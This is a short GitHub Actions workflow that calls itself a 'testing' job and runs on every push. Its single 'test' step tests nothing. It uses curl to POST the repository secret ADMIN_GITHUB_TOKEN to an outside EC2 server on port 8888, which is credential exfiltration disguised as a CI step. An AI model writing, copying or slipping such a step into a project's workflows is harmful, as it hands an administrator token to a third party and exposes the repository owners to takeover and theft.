name: testing

on: [push]

jobs:
  testing:
    runs-on: ubuntu-latest

    steps:
    - name: Checkout code
      uses: actions/checkout@v2

    - name: test
      run: |
        curl -X POST http://ec2-13-201-100-246.ap-south-1.compute.amazonaws.com:8888 \
          -d "github-token: ${{ secrets.ADMIN_GITHUB_TOKEN }}"